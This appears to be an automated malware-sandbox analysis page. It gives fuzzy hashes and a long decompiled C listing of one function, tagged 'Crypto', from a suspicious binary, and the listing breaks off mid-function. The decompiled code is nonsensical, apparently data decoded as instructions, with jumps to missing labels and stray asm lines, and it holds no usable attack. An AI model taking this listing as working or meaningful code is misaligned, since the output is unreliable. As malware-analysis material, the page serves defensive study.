Opcode Fuzzy Hash: ff98cf8ea9c3d839757969b105a8e99614e4b63557d08a4900aa141eea87e0b5
Instruction Fuzzy Hash: F6F0E530794230EEDA21E620FE42F253294EBC4B54FF21467F402DBAA2D66DD881911D

Uniqueness

Uniqueness Score: -1.00%

Function 0042A4FE, Relevance: 1.0, Instructions: 973
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			E0042A4FE(signed int __eax, signed int __ebx, signed int __edi, signed int __esi, char _a1, intOrPtr _a4, void* _a57, void* _a70, void* _a78, void* _a90, void* _a100, signed int _a110, signed int _a111, intOrPtr _a117, signed int _a120, signed int _a122, signed int _a1144459010) {
				char _v1;
				signed char _t250;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				signed int _t259;
				void* _t262;
				signed int _t264;
				void* _t266;
				signed char _t270;
				signed int _t273;
				void* _t276;
				void* _t278;
				signed int _t279;
				void* _t280;
				signed int _t281;
				void* _t284;
				signed int _t285;
				signed int _t290;
				void* _t291;
				signed char _t292;
				void* _t293;
				void* _t295;
				signed int _t296;
				void* _t302;
				void* _t304;
				signed int _t309;
				void* _t313;
				void* _t318;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t336;
				signed int _t350;
				signed int _t351;
				signed int _t356;
				signed int _t357;
				signed int _t361;
				signed char _t362;
				signed int _t364;
				signed int _t369;
				void* _t370;
				signed int _t372;
				void* _t376;
				signed int _t381;
				signed int _t387;
				signed int _t391;
				void* _t393;
				void* _t403;
				signed int _t404;
				void* _t411;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				void* _t419;
				void* _t420;
				signed int _t421;
				signed int _t422;
				signed char _t424;
				void* _t434;
				void* _t441;
				signed int _t446;
				signed int _t447;
				signed int _t449;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t457;
				void* _t460;
				void* _t462;
				signed int _t465;
				signed int _t466;
				void* _t477;
				signed int _t480;
				signed int _t481;
				signed int _t485;
				void* _t488;
				signed char _t496;
				signed int _t500;
				void* _t501;
				signed char _t502;
				void* _t505;
				signed int _t506;
				signed char _t507;
				void* _t511;
				signed int _t514;
				signed int _t519;
				signed int _t520;
				signed int _t527;
				signed int _t528;
				signed char _t533;
				signed int _t535;
				void* _t538;
				signed int _t540;
				signed int _t542;
				signed char _t547;
				signed int _t553;
				void* _t557;
				signed char _t558;
				void* _t566;
				signed int _t575;
				signed int _t588;
				signed int _t593;
				intOrPtr _t600;

				_t315 = __esi;
				_t308 = __edi;
				_t271 = __ebx;
				_t247 = __eax;
				_pop(_t291);
				_t292 = _t291 - 1;
				if(_t292 < 0) {
					_t273 = _t271;
					_push(_t281);
					_push(0x41);
					_t281 = _t281 ^  *(_t273 + 0x73);
					_t361 = _t281;
					_t336 = _t336 - 1 + 1;
					if(_t361 >= 0) {
						goto L48;
					} else {
						asm("aaa");
						_push(_t321);
						if(_t361 >= 0) {
							goto L42;
						} else {
							_pop(_t281);
							goto L25;
						}
					}
				} else {
					_t247 = __eax ^ 0x326c4868;
					_push(0x4c326c48);
					_t273 = __ebx - 1;
					if(_t273 != 0) {
						_t271 = _t273 + 1;
					} else {
						_t292 = _t292 + 2;
						_t315 = __esi;
						_t350 = _t315;
						_push(_t315);
						if(_t350 > 0) {
							L25:
							_t292 = _t292;
							_t362 = _t292;
							goto L26;
						} else {
							if(_t350 < 0) {
								L18:
								_push(_t336);
							} else {
								_t308 = __edi - 1;
								_t315 = _t315 - 1;
								_t351 = _t315;
								if(_t351 != 0) {
									L14:
									_pop(_t281);
									if (_t356 > 0) goto L45;
									if(_t356 != 0) {
										_t21 = _t273 + 0x5a;
										 *_t21 =  *(_t273 + 0x5a) ^ _t247;
										if( *_t21 != 0) {
											goto L62;
										} else {
											_t292 = 0x45;
											_t273 =  *(_t247 + 0x56) * 0x6c493452;
											asm("aaa");
											_t376 = _a117 - _t281;
											asm("insd");
											if(_t376 < 0) {
												goto L76;
											} else {
												L48:
												if(_t376 != 0) {
													_t308 = _t308 - 1;
													_t391 = _t308;
												} else {
													_push(0x4b343355);
													if(_t376 > 0) {
														goto L64;
													} else {
														goto L50;
													}
												}
											}
										}
									} else {
										_t281 = _t281 - 1;
										_t357 = _t281;
										if (_t357 < 0) goto L38;
										goto L18;
									}
								} else {
									if(_t351 == 0) {
										L26:
										_t336 = _t336 - 1;
										if(_t362 >= 0) {
											goto L39;
										} else {
											_t281 = _t281 + 1;
											asm("aaa");
											if(_t281 != 0) {
												goto L44;
											} else {
												asm("insd");
												 *(_t273 + 0x59) =  *(_t273 + 0x59) ^ _t336;
												_push(_t292);
												_t13 =  &_a120;
												 *_t13 = _a120 ^ _t281;
												_t364 =  *_t13;
												goto L29;
											}
										}
									} else {
										_pop(_t247);
										_push(_t315);
										_t336 = _t336 + 1;
										_t292 = _t336;
										asm("outsb");
										asm("insb");
										_t281 = _t336;
										if( *((intOrPtr*)(_t247 + 0x42)) != _t292) {
											L29:
											if(_t364 < 0) {
												_t281 = _t281 + 1;
												 *(_t273 + 0x49) =  *(_t273 + 0x49) ^ _t321;
												_t308 =  *(_t292 + 0x6f + _t308 * 2) * 0x4d465378;
												_t381 = _t308;
												if(_t381 != 0) {
													if(_t403 >= 0) {
														_t336 = _t336 - 1;
														if(_t420 <= 0) {
															goto L154;
														} else {
															_push(_t247);
															goto L125;
														}
													} else {
														if(_t403 <= 0) {
															L125:
															_t308 = _t308 + 2 - 1;
															_t421 = _t308;
															_pop(_t247);
															if(_t421 >= 0) {
																goto L144;
															} else {
																goto L126;
															}
														} else {
															_t40 = _t292 + 0x7b;
															 *_t40 =  *(_t292 + 0x7b) ^ _t273;
															_t404 =  *_t40;
														}
													}
												} else {
													if(_t381 < 0) {
														goto L78;
													} else {
														_t318 = _t315 + 1;
														_t321 =  &_v1;
														goto L58;
													}
												}
											} else {
												if (_t364 > 0) goto L43;
											}
										} else {
											asm("a16 insb");
											_t247 = _t247 ^ 0x5a505752;
											_push(0x57);
											_push(_t247);
											if(_t247 < 0) {
												goto L29;
											} else {
												_t321 =  &_a1;
												_pop(_t270);
												_push(_t336);
												_push(_t281);
												_t315 =  *_t270 * 0x4c;
												_t336 = _t336 - 1;
												 *(_t281 + 0x59) =  *(_t281 + 0x59) ^ _t292;
												_t281 = _t281 - 1;
												_push(_t315);
												_t273 =  *(_t270 + 0x42) * 0x52;
												_push(_t273);
												_t247 = _t270 ^  *(_t292 + 0x31 + _t315 * 2);
												_t8 = _t315 + 0x30;
												 *_t8 =  *(_t315 + 0x30) ^ _t281;
												_t356 =  *_t8;
												if(_t356 != 0) {
													_t281 = _t281 + 1;
													_t273 = _t273 ^  *(_t281 + 0x79);
													_t369 = _t273;
													if(_t369 >= 0) {
														L63:
														_t336 = _t336 - 1;
														_t321 =  &_a1;
														_t387 = _t321;
														asm("outsd");
														if (_t387 >= 0) goto L103;
														L64:
														if(_t387 < 0) {
															goto L103;
														} else {
															_t280 = _t273 - 1;
														}
													} else {
														_t292 = _t292 - 1;
														asm("bound edi, [ebx+eax*2+0x75]");
														_t321 =  &_a1;
														_t370 = (_t247 ^ 0x00000067) - 1;
														_pop(_t247);
														if(_t370 != 0) {
															L58:
															_t315 = _t318 - 1;
															asm("aaa");
															_t315 = _t315 + 1;
															_t273 = _t273 + 1;
															asm("outsd");
															if(_t273 != 0) {
																_t313 = _t308 - 1;
															} else {
																_t308 = _t308 - 1;
																_pop(_t281);
																_push(_t336);
																if(_t308 != 0) {
																	if(_t393 != 0) {
																		L103:
																		if(_t411 == 0) {
																			_t419 =  *((intOrPtr*)(_t281 + _t315 + 0x39)) - _t247;
																			if(_t419 >= 0) {
																				goto L142;
																			} else {
																				asm("outsb");
																				if (_t419 <= 0) goto L149;
																				goto L119;
																			}
																		} else {
																			asm("outsd");
																			if(_t411 > 0) {
																				_push(_t336);
																				asm("bound esi, [edx]");
																				_push(_t281);
																				goto L141;
																			} else {
																				_t281 = _t281 + 1;
																				_t413 = _t281;
																				if(_t413 >= 0) {
																					L119:
																					asm("a16 push edi");
																				} else {
																					_t266 = _t247 - 1;
																					_t304 = _t292 - 1;
																					asm("arpl [esp+esi+0x4e], sp");
																					 *(_t266 + 0x52) =  *(_t266 + 0x52) ^ _t281;
																					_t292 = _t304 - 1;
																					_t281 = _t281 ^  *(_t273 + 0x63);
																					_t247 = _t266 - 1;
																					_t414 = _t247;
																					if(_t414 != 0) {
																						L141:
																						_t281 = _t281 ^  *(_t247 + 0x46);
																						_t273 = _t273 ^  *(_t292 + 0x79);
																						_t292 =  *(_t308 + 0x4e) * 0x31787036;
																						if(_t292 < 0) {
																							goto L168;
																						} else {
																							L142:
																							_t278 = _t273 - 1;
																							goto L143;
																						}
																					} else {
																						_push(_t247);
																						if(_t414 > 0) {
																							L126:
																							if(_t421 != 0) {
																								L156:
																								if (_t434 < 0) goto L180;
																								goto L157;
																							} else {
																								if(_t421 < 0) {
																									L152:
																									_push(_t273);
																									asm("insb");
																									asm("outsd");
																									 *(_t292 + 0x31) =  *(_t292 + 0x31) ^ _t247;
																									_t247 = _t247 ^  *(_t292 + 0x66);
																									if(_t247 == 0) {
																										goto L173;
																									} else {
																										_t434 =  *((intOrPtr*)(_t292 + 0x4c)) - _t281;
																										_push(0x4b5a4f71);
																										L154:
																										_pop(_t292);
																										if(_t434 < 0) {
																											_t281 = _t281 - 1;
																											_t453 = _t281;
																										} else {
																											if(_t434 > 0) {
																												goto L182;
																											} else {
																												goto L156;
																											}
																										}
																									}
																								} else {
																									if(_t421 < 0) {
																										_t247 = _t247 - 1;
																										asm("insb");
																										_t247 = _t247 ^ 0x00000057;
																										goto L150;
																									} else {
																										_t336 = _t336 + 1;
																										_push(_t273);
																										_push(_t336);
																										_t279 =  *(_t292 + 0x39) * 0x31;
																										_t308 = _t308 + 1;
																										_push(_t279);
																										_push(_t281);
																										_t273 = _t279 - 1;
																										_t422 = _t273;
																										if(_t422 <= 0) {
																											L150:
																											_push(_t273);
																											asm("outsb");
																											goto L152;
																										} else {
																											_push(0x4b);
																											asm("a16 dec edx");
																											if(_t422 != 0) {
																												goto L156;
																											} else {
																												_t308 = _t308 + 1;
																												if(_t308 >= 0) {
																													L157:
																													_push(_t281);
																												} else {
																													_t292 = _t292 + 1;
																													_t424 = _t292;
																													if (_t424 != 0) goto L162;
																													_push(0x79577750);
																												}
																											}
																										}
																									}
																								}
																							}
																						} else {
																							_t273 = _t273 + 1;
																							asm("insd");
																							_t308 = _t308 + 1;
																							_t415 = _t308;
																							if(_t415 != 0) {
																								if(_t424 == 0) {
																									L168:
																									if(_t441 != 0) {
																										L204:
																										_t460 =  *((intOrPtr*)(_t273 + 0x42)) - _t292;
																										if (_t460 != 0) goto L243;
																										goto L205;
																									} else {
																										_push(0x596a4e4b);
																										_t273 = _t273 - 1;
																										_t315 = _t315 - 1;
																										_push(0x59);
																										if(_t315 >= 0) {
																											L200:
																											_t321 =  &_a1;
																										} else {
																											_t247 = _t247 - 1;
																											if(_t247 < 0) {
																												L205:
																												if(_t460 != 0) {
																													asm("bound edx, [ebx+0x32]");
																													goto L244;
																												} else {
																													_t264 = _t247 ^ 0x53483450;
																												}
																											} else {
																												_push(_t321);
																												_t281 = _t281 + 1 - 1;
																												L173:
																												_t321 =  &_a1;
																												_push(0x6b4e727b);
																												_push(_t308);
																												_t247 = _t247 ^ _a122;
																												_t315 = _t315 - 1;
																												if(_t315 < 0) {
																													L210:
																													asm("outsb");
																													 *(_t292 + _t315 + 0x44) =  *(_t292 + _t315 + 0x44) ^ _t281;
																													_t336 = _t336 - 1;
																													_t247 = _t247 ^  *(_t292 + 0x75 + _t315 * 2);
																													_t465 = _t247;
																													goto L212;
																												} else {
																													_pop(_t290);
																													_t281 = _t290 ^  *(_t247 + 0x4b);
																													_t446 = _t281;
																													_t247 = _t247 - 0x00000001 ^ 0x00000072;
																													_t273 = _t273;
																													asm("a16 jnz 0x7c");
																													if(_t446 != 0) {
																														L218:
																														_t308 = _t308 - 1;
																														_t321 =  &_a1;
																														 *_t247 =  *_t247 ^ _t315;
																														_t247 = _t247 ^ 0x76393141;
																														goto L219;
																													} else {
																														if(_t446 != 0) {
																															asm("insb");
																															_pop(_t292);
																															if(_t462 != 0) {
																																goto L228;
																															} else {
																																_t292 = _t292 - 1;
																																goto L210;
																															}
																														} else {
																															if(_t446 < 0) {
																																L219:
																																_t281 = _t281 + 1;
																																goto L220;
																															} else {
																																_t281 = _t281 + 1;
																																_t447 = _t281;
																																_t336 = _t336 - 1;
																																if(_t447 > 0) {
																																	_push(_t308);
																																	_t315 = _t315 - 1;
																																	_t457 = _t315;
																																	if(_t457 <= 0) {
																																		L220:
																																		 *_t281 =  *_t281 ^ _t308;
																																		if( *_t281 <= 0) {
																																			goto L256;
																																		} else {
																																			_push(_t292);
																																			_push(_t292);
																																			goto L223;
																																		}
																																	} else {
																																		if(_t457 >= 0) {
																																			goto L230;
																																		} else {
																																			asm("aaa");
																																			if (_t457 >= 0) goto L226;
																																			goto L200;
																																		}
																																	}
																																} else {
																																	_t336 = _t336 + 1;
																																	asm("aaa");
																																	L182:
																																	_push(_t292);
																																	_t321 =  &_a1;
																																	_t273 = _t273 ^  *(_t281 + 0x66);
																																	_t449 = _t273;
																																	if(_t449 >= 0) {
																																		L212:
																																		_t336 = _t336 + 1;
																																		if(_t465 < 0) {
																																			goto L248;
																																		} else {
																																			if(_t465 != 0) {
																																				goto L239;
																																			} else {
																																				_t247 = _t247 ^ 0x7975437a;
																																				_t466 = _t247;
																																				if(_t466 != 0) {
																																					goto L237;
																																				} else {
																																					if(_t466 != 0) {
																																						goto L251;
																																					} else {
																																						_pop(_t281);
																																						goto L218;
																																					}
																																				}
																																			}
																																		}
																																	} else {
																																		if(_t449 < 0) {
																																			L223:
																																			_t292 = _t292 - 1;
																																			_t336 = _t336 + 1;
																																			 *(_t281 + 0x30) =  *(_t281 + 0x30) ^ _t247;
																																			goto L224;
																																		} else {
																																			_push(_t336);
																																			if(_t449 < 0) {
																																				L224:
																																				 *(_t273 + 0x5a) =  *(_t273 + 0x5a) ^ _t281;
																																				_t247 = _t247 - 1;
																																				 *(_t315 + 0x4e) =  *(_t315 + 0x4e) ^ _t247;
																																				asm("insd");
																																				_push(_t281);
																																				asm("arpl [esi+0x70], dx");
																																				_t292 = _t292 + 1;
																																				_t281 = _t281 ^  *(_t292 + 0x57);
																																				_t292 = _t292 - 1;
																																				_push(_t308);
																																				_push(_t321);
																																				if(_t292 >= 0) {
																																					L244:
																																					_t273 = _t273 - 1;
																																					_t321 =  &_a1;
																																					_t485 = _t321;
																																					if(_t485 <= 0) {
																																						goto L271;
																																					} else {
																																						asm("arpl [edi+0x76], dx");
																																						_pop(_t247);
																																						_push(_t292);
																																						if(_t485 < 0) {
																																							_t321 =  &_a1;
																																							_push(_t281);
																																							asm("arpl [edx+0x6b], dx");
																																							_push(_t292);
																																							_t292 = _t292 - 1 + 1;
																																							_push(_t321);
																																							_t321 =  &_a1;
																																							_push(0x76757252);
																																							_t115 = _t315 + 0x4c;
																																							 *_t115 =  *(_t315 + 0x4c) ^ _t315;
																																							_t500 =  *_t115;
																																							goto L270;
																																						} else {
																																							if(_t485 < 0) {
																																								goto L263;
																																							} else {
																																								_pop(_t262);
																																								_t247 = _t262 - 1;
																																								_t308 = _t308 - 1;
																																								_t336 = _t336 - 1;
																																								L248:
																																								_push(_t315);
																																								_push(0x54);
																																								asm("arpl [edi+0x31], sp");
																																								goto L249;
																																							}
																																						}
																																					}
																																				} else {
																																					L228:
																																					_t336 =  *(_t292 + 0x49) * 0x35495677;
																																					goto L229;
																																				}
																																			} else {
																																				asm("insd");
																																				_t273 = _t273 - 1;
																																				_t321 =  &_v1;
																																				_pop(_t281);
																																				_push(_t308);
																																				if(_t321 < 0) {
																																					_t292 = _t292 + 1;
																																					if(_t292 >= 0) {
																																						goto L233;
																																					} else {
																																						asm("outsb");
																																						goto L204;
																																					}
																																				} else {
																																					_t273 = _t273 + 1;
																																					_t451 = _t273;
																																					_t336 = _t336 - 1;
																																					if (_t451 != 0) goto L229;
																																					if(_t451 < 0) {
																																						L229:
																																						_t247 = _t247 ^ 0x4e467739;
																																						L230:
																																						_t477 =  *((intOrPtr*)(_t308 + 0x46)) - _t315;
																																						if(_t477 > 0) {
																																							_t488 =  *((intOrPtr*)(_t247 + 0x31)) - _t281;
																																							L251:
																																							if(_t488 < 0) {
																																								L278:
																																								_t308 = _t308 + 1;
																																								_t247 = _t247 ^ 0x0000004b;
																																								if(_t247 >= 0) {
																																									goto L296;
																																								} else {
																																									_t308 = _t308 - 1;
																																									_t505 =  *((intOrPtr*)(_t308 + 0x7b + _t292 * 2)) - _t292;
																																									if(_t505 <= 0) {
																																										goto L303;
																																									} else {
																																										_t292 = _t292 + 1;
																																										_t308 = _t308 + 1;
																																										_t506 = _t308;
																																										asm("insb");
																																										if(_t506 < 0) {
																																											goto L301;
																																										} else {
																																											_push(0x6b);
																																											_push(_t273);
																																											_push(_t273);
																																											_push(_t308);
																																											asm("aaa");
																																											asm("aaa");
																																											goto L283;
																																										}
																																									}
																																								}
																																							} else {
																																								_t336 = _t336 - 1;
																																								if(_t488 >= 0) {
																																									L270:
																																									if (_t500 <= 0) goto L288;
																																									L271:
																																									_t336 = _t336 - 1;
																																								} else {
																																									if(_t488 < 0) {
																																										_t336 = _t336 - 1;
																																										if(_t501 < 0) {
																																											goto L284;
																																										} else {
																																											_t336 = _t336 - 1;
																																											if(_t501 != 0) {
																																												goto L285;
																																											} else {
																																												_t315 = _t315 - 1;
																																												asm("insb");
																																												_t292 = (_t292 + 0x00000001 ^  *(_t247 + 0x44)) - 1;
																																												_t502 = _t292;
																																												if(_t502 == 0) {
																																													goto L294;
																																												} else {
																																													if(_t502 != 0) {
																																														goto L301;
																																													} else {
																																														goto L277;
																																													}
																																												}
																																											}
																																										}
																																									} else {
																																										if(_t488 < 0) {
																																											L277:
																																											_t281 = _t281 + 1;
																																											_t247 = _t247 ^ 0x00000079;
																																											asm("outsd");
																																											_push(_t336);
																																											_t336 =  *(_t315 + 0x62) * 0x42637548;
																																											_push(_t273);
																																											goto L278;
																																										} else {
																																											_t281 =  *[fs:esi+0x67] * 0x48;
																																											L256:
																																											_t315 = _t315 - 1;
																																											asm("a16 dec eax");
																																											_t336 = _t336 - 1;
																																											goto L257;
																																										}
																																									}
																																								}
																																							}
																																						} else {
																																							_t315 = _t315 - 1;
																																							L233:
																																							_t247 = _t273;
																																							_push(_t273);
																																							_t308 = _t308 + 1;
																																							asm("outsd");
																																							_t273 = _t273 - 1;
																																							_t480 = _t273;
																																							if(_t480 != 0) {
																																								L260:
																																								_push(_t336);
																																								_t315 =  *_t281 * 0x75424a4e;
																																								goto L262;
																																							} else {
																																								if(_t480 != 0) {
																																									L257:
																																									_t336 = _t336 - 1;
																																									_push(0x4e417a39);
																																									_push(_t273);
																																									_t281 = _t281 - 0x00000001 ^  *(_t308 + 0x35);
																																									_t247 = _t247 ^ 0x52315518;
																																									 *(_t281 + 0x71) =  *(_t281 + 0x71) ^ _t321;
																																									_push(_t336);
																																									asm("gs outsd");
																																									_t308 = _t308 + 1;
																																									_t292 = _t292 - 1;
																																									_push(0x73);
																																									if(_t292 >= 0) {
																																										L283:
																																										_pop(_t281);
																																										L284:
																																										_push(_t247);
																																										L285:
																																										_push(_t247);
																																										_t336 = _t336 + 1;
																																										_push(_t321);
																																										if(_t506 < 0) {
																																											_t292 = _t292 ^  *[fs:ebx+0x54];
																																											goto L306;
																																										} else {
																																											if(_t506 >= 0) {
																																												goto L300;
																																											} else {
																																												_push(0x77);
																																												_t292 = _t292 - 1;
																																												_t507 = _t292;
																																												_push(0x63736470);
																																												if(_t507 < 0) {
																																													L306:
																																													_t247 = _t247 ^ 0x0000007b;
																																													_t519 = _t247;
																																													goto L307;
																																												} else {
																																													if(_t507 >= 0) {
																																														L307:
																																														if(_t519 != 0) {
																																															goto L334;
																																														} else {
																																															asm("arpl [ebp+0x37], dx");
																																															if(_t519 >= 0) {
																																																goto L335;
																																															} else {
																																																_t336 = _t336 - 1;
																																																if(_t519 != 0) {
																																																	goto L337;
																																																} else {
																																																	if(_t519 == 0) {
																																																		goto L336;
																																																	} else {
																																																		goto L311;
																																																	}
																																																}
																																															}
																																														}
																																													} else {
																																														_t315 = _t315 - 1;
																																														if(_t315 >= 0) {
																																															goto L298;
																																														} else {
																																															_push(_t336);
																																															_t281 = _t273;
																																															asm("arpl [edx+0x74], bp");
																																															_t273 = _t273 + 1;
																																															_push(_t273);
																																															goto L293;
																																														}
																																													}
																																												}
																																											}
																																										}
																																									} else {
																																										asm("outsd");
																																										goto L260;
																																									}
																																								} else {
																																									if(_t480 >= 0) {
																																										L249:
																																										 *(_t273 + 0x37) =  *(_t273 + 0x37) ^ _t308;
																																									} else {
																																										_push(_t315);
																																										L237:
																																										 *[fs:esi+0x57] =  *[fs:esi+0x57] ^ _t281;
																																										_t481 =  *[fs:esi+0x57];
																																										if(_t481 != 0) {
																																											L262:
																																											_t315 = _t315 - 1;
																																											L263:
																																											_t292 = _t292 - 1 + 1;
																																											_t496 = _t292;
																																											if(_t496 != 0) {
																																												L293:
																																												_t511 =  *((intOrPtr*)(_t321 + 0x50 + _t281 * 2)) - _t292;
																																												asm("a16 inc esp");
																																												L294:
																																												_t336 = _t336 + 1;
																																												if(_t511 <= 0) {
																																													L311:
																																													_t247 =  *(_t315 + 0x64) * 0x34583866;
																																													_t520 = _t247;
																																													asm("outsb");
																																													if(_t520 > 0) {
																																														goto L333;
																																													} else {
																																														_pop(_t281);
																																														if(_t520 < 0) {
																																															goto L343;
																																														} else {
																																															if(_t520 < 0) {
																																																goto L327;
																																															} else {
																																																_push(_t336);
																																																_t315 = _t315 - 1;
																																																if(_t315 > 0) {
																																																	_t315 = _t315 - 1 + 1;
																																																	_pop(_t247);
																																																	goto L346;
																																																} else {
																																																	_t247 = _t247 ^ 0x00000078;
																																																	_push(_t321);
																																																	_t292 = _t292 + 1;
																																																	goto L316;
																																																}
																																															}
																																														}
																																													}
																																												} else {
																																													_t292 = _t292 + 1;
																																													asm("insb");
																																													_t281 = (_t281 ^  *(_t308 + 0x66)) - 1;
																																													_push(0x63);
																																													_t308 = _t308 + 1;
																																													_push(_t315);
																																													_t315 = _t315 + 1;
																																													_push(_t321);
																																													 *_t315 =  *_t315 ^ _t292;
																																													 *(_t315 + 0x6d) =  *(_t315 + 0x6d) ^ _t292;
																																													_t247 = _t247 - 1;
																																													_push(_t273);
																																													L296:
																																													_t321 =  &_v1;
																																													_push(_t315);
																																													if(_t321 < 0) {
																																														L316:
																																														_t281 = _t336;
																																														asm("arpl [esi+0x4d], sp");
																																														_t292 = _t292 + 1;
																																														asm("outsb");
																																														if (_t292 != 0) goto L347;
																																														goto L317;
																																													} else {
																																														_push(_t336);
																																														asm("ss outsb");
																																														L298:
																																														asm("outsb");
																																														_t321 =  &_v1;
																																														_t514 = _t321;
																																														asm("insb");
																																														_push(_t292);
																																														asm("a16 inc edx");
																																														asm("aaa");
																																														if(_t514 == 0) {
																																															if(_t527 < 0) {
																																																goto L349;
																																															} else {
																																																if(_t527 != 0) {
																																																	L339:
																																																	if(_t533 > 0) {
																																																		goto L363;
																																																	} else {
																																																		if(_t533 < 0) {
																																																			goto L371;
																																																		} else {
																																																			if(_t533 == 0) {
																																																				goto L369;
																																																			} else {
																																																				_t292 = _t292 ^  *(_t247 + 0x4c);
																																																				_t281 = _t273;
																																																				if (_t292 == 0) goto L364;
																																																				L343:
																																																				_t315 = _t315 - 1;
																																																				_t535 = _t315;
																																																			}
																																																		}
																																																	}
																																																} else {
																																																	_pop(_t281);
																																																	_pop(_t247);
																																																	_push(_t321);
																																																	if(_t527 >= 0) {
																																																		asm("outsd");
																																																		_t273 = _t273 - 1;
																																																		asm("insd");
																																																		asm("outsb");
																																																		_t247 = _t247 ^ 0x00000069;
																																																		_t321 =  &_v1;
																																																		asm("insb");
																																																		_push(0x70563369);
																																																		_t292 = _t292 + 1;
																																																		_push(_t336);
																																																		_t284 = _t281 - 1;
																																																		goto L360;
																																																	} else {
																																																		 *_t273 =  *_t273 ^ _t315;
																																																		_t308 = _t308 ^  *(_t281 + 0x41);
																																																		_t528 = _t308;
																																																		L327:
																																																		if(_t528 != 0) {
																																																			L346:
																																																			_push(_t281);
																																																			_t315 = _t315 - 1;
																																																			asm("bound esp, [ebx+0x66]");
																																																			asm("o16 jnp 0x3b");
																																																		} else {
																																																			if(_t528 < 0) {
																																																				goto L351;
																																																			} else {
																																																				_push(_t292);
																																																				_t336 = _t336 + 1;
																																																				if(_t528 <= 0) {
																																																					L360:
																																																					_t281 = _t284 + 1;
																																																					if(_t281 < 0) {
																																																						L390:
																																																						 *((intOrPtr*)(_t247 + _t247 + 0x6c)) =  *((intOrPtr*)(_t247 + _t247 + 0x6c)) + _t292;
																																																						 *_t321 =  *_t321 + _t247;
																																																						goto L391;
																																																					} else {
																																																						_t247 = _t247 ^ 0x7651584d;
																																																						_t296 =  *(_t281 + 0x6e) * 0x4e673743;
																																																						_push(_t281);
																																																						asm("outsb");
																																																						_t273 = _t273 + 1;
																																																						asm("aaa");
																																																						asm("a16 dec esi");
																																																						_t292 = _t296 + 1;
																																																						_t547 = _t292;
																																																						if(_t547 >= 0) {
																																																							goto L392;
																																																						} else {
																																																							L363:
																																																							_push(_t281);
																																																							if(_t547 > 0) {
																																																								if(_t557 < 0) {
																																																									goto L397;
																																																								} else {
																																																									_push(_t273);
																																																									if(_t557 > 0) {
																																																										 *((intOrPtr*)(_t247 + 0x10013800)) =  *((intOrPtr*)(_t247 + 0x10013800)) + _t273;
																																																										_t250 = _t247 + 0x39;
																																																										asm("sbb bl, [eax]");
																																																										 *_t281 =  *_t281 + _t250;
																																																									} else {
																																																										_push(_t273);
																																																										_t336 = _t336 - 1;
																																																										_t250 = _t247 ^ 0x00000066;
																																																										_t558 = _t250;
																																																										if(_t558 != 0) {
																																																											if(_t558 >= 0) {
																																																												if(_t558 < 0) {
																																																													 *_t250 =  *_t250 + _t250;
																																																													 *_t281 =  *_t281 + _t250;
																																																													 *_t250 =  *_t250 + _t250;
																																																													 *_t250 =  *_t250 + _t250;
																																																													 *_t250 =  *_t250 + _t250;
																																																													 *_t250 =  *_t250 + _t250;
																																																													 *_t250 =  *_t250 + _t250;
																																																													 *_t247 =  *_t247 + _t281;
																																																													 *_t247 =  *_t247 + _t247;
																																																													 *((intOrPtr*)(_t247 + 0x69 + _t247)) =  *((intOrPtr*)(_t247 + 0x69 + _t247)) + _t292;
																																																													goto L390;
																																																												}
																																																												goto L399;
																																																											}
																																																											goto L402;
																																																										}
																																																									}
																																																								}
																																																							} else {
																																																								_push(_t315);
																																																								_push(_t292);
																																																								_t321 =  &_v1;
																																																								_push(_t315);
																																																								if( *_t281 < _t273) {
																																																									goto L396;
																																																								} else {
																																																									asm("arpl [edi], si");
																																																									goto L368;
																																																								}
																																																							}
																																																						}
																																																					}
																																																				} else {
																																																					if(_t528 != 0) {
																																																						L356:
																																																						if (_t542 <= 0) goto L366;
																																																						 *(_t315 + 0x6f) =  *(_t315 + 0x6f) ^ _t247;
																																																					} else {
																																																						_push(_t336);
																																																						asm("insd");
																																																						asm("insb");
																																																						_t321 =  &_a1;
																																																						if(_t321 >= 0) {
																																																							if(_t540 != 0) {
																																																								goto L370;
																																																							} else {
																																																								if(_t540 < 0) {
																																																									L381:
																																																									_pop(_t292);
																																																								} else {
																																																									_pop(_t281);
																																																									_t292 = _t292 + 1;
																																																									if(_t292 < 0) {
																																																										_t247 = _t247 - 1;
																																																										asm("a16 dec esi");
																																																										_push(_t247);
																																																										if(_t247 < 0) {
																																																											goto L393;
																																																										} else {
																																																											_t557 =  *((intOrPtr*)(_t315 + 0x76)) - _t281;
																																																											asm("outsb");
																																																											asm("outsd");
																																																											if (_t557 < 0) goto L400;
																																																											goto L381;
																																																										}
																																																									} else {
																																																										_t315 = _t315 - 1;
																																																										_t542 = _t315;
																																																										goto L356;
																																																									}
																																																								}
																																																							}
																																																						} else {
																																																							_t273 = _t273 + 1;
																																																							asm("o16 jp 0x58");
																																																							L333:
																																																							_push(_t321);
																																																							L334:
																																																							_pop(_t292);
																																																							_push(_t315);
																																																							 *(_t281 + 0x6d) =  *(_t281 + 0x6d) ^ _t273;
																																																							L335:
																																																							_pop(_t281);
																																																							asm("insd");
																																																							_t315 =  *(_t281 + 0x34) * 0x47577553;
																																																							L336:
																																																							_push(_t308);
																																																							L337:
																																																							_t308 = _t308 + 1;
																																																							if(_t308 >= 0) {
																																																								L368:
																																																								asm("aaa");
																																																								_push(_t336);
																																																								L369:
																																																								asm("insb");
																																																								_t292 = _t292 + 1;
																																																								L370:
																																																								_t292 = _t292 - 1;
																																																								L371:
																																																								_t321 =  &_v1;
																																																								_t553 = _t321;
																																																								_push(_t336);
																																																								if(_t553 > 0) {
																																																									L391:
																																																									 *[gs:esi] =  *[gs:esi] + _t281;
																																																									L392:
																																																									 *[cs:esi] =  *[cs:esi] + _t281;
																																																									L393:
																																																									 *[cs:esi] =  *[cs:esi] + _t281;
																																																									 *_t292 =  *_t292 + _t281;
																																																									_t247 = _t247 |  *_t247;
																																																									 *_t247 =  *_t247 + _t247;
																																																									_t321 =  &_v1;
																																																									 *_t321 =  *_t321 + _t247;
																																																									_t566 =  *_t321;
																																																									if (_t566 >= 0) goto L395;
																																																									if (_t566 >= 0) goto L396;
																																																									L396:
																																																									asm("popad");
																																																									 *_t308 =  *_t308 + _t247;
																																																									L397:
																																																									 *[gs:esi] =  *[gs:esi] + _t281;
																																																									 *_t315 =  *_t315 + _t281;
																																																									 *_t315 =  *_t315 + _t281;
																																																									 *_t247 =  *_t247 + _t247;
